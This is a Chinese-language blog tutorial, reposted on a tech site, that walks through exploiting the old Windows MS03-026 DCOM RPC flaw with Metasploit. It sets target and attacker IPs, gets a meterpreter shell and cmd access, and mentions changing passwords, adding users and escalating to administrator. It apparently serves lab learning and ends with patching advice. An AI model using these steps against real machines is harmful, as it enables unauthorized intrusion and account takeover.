经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 数据库/运维 » Windows » 查看文章
windows漏洞MS03_026
来源:cnblogs  作者:MarsCat  时间:2019/5/21 9:20:05  对本文有异议

话不多说,直接进入正题

第一步查看是否能ping通,第二步就是扫描端口,开放了端口才能进行攻击

linux进入msfconsole,搜索03_026

  1. search 03_026

等待一会,返回漏洞的全名,exploit是一个攻击模块

接下来就是使用这个漏洞(在linux里复制快捷键是ctrl+shift+c,粘贴快捷键是ctrl+shift+v,这样就不用按鼠标右键点)

  1. use exploit/windows/dcerpc/ms03_026_dcom

 显示需要配置的信息,条件

  1. show options

只要是Required一栏里,有yes的,都是必填项,第一行填的就是靶机的ip地址

  1. set RHOST 192.168.X.X

这时在设置一下攻击机的ip

  1. set LHOST 192.168.X.X

 设置完毕后,就可以进行攻击了,可用exploit或者run进行,一般都是用exploit

  1. exploit

这时前缀就不是msf了

已经变成meterpreter,这时候输入shell

就进入到靶机的cmd里

 

查看用户

linux查看

 

windows查看

 

可以看到,用户都是一样的,所以我们可以进行更改用户密码,还可以新建新的用户,并且还可以把普通用户提升为超级管理员

 受到03_026影响的系统有

 

虽然受影响的系统都很老了,我们已经用不到了,但在现在的新系统又会有新的漏洞,只是还没有给发现,所以还是需要在日常生活中多去注意计算机的安全,要一周打一次补丁,否则哪天自己的计算机就遭殃了。

原文链接:http://www.cnblogs.com/MarsCat233/p/10894196.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号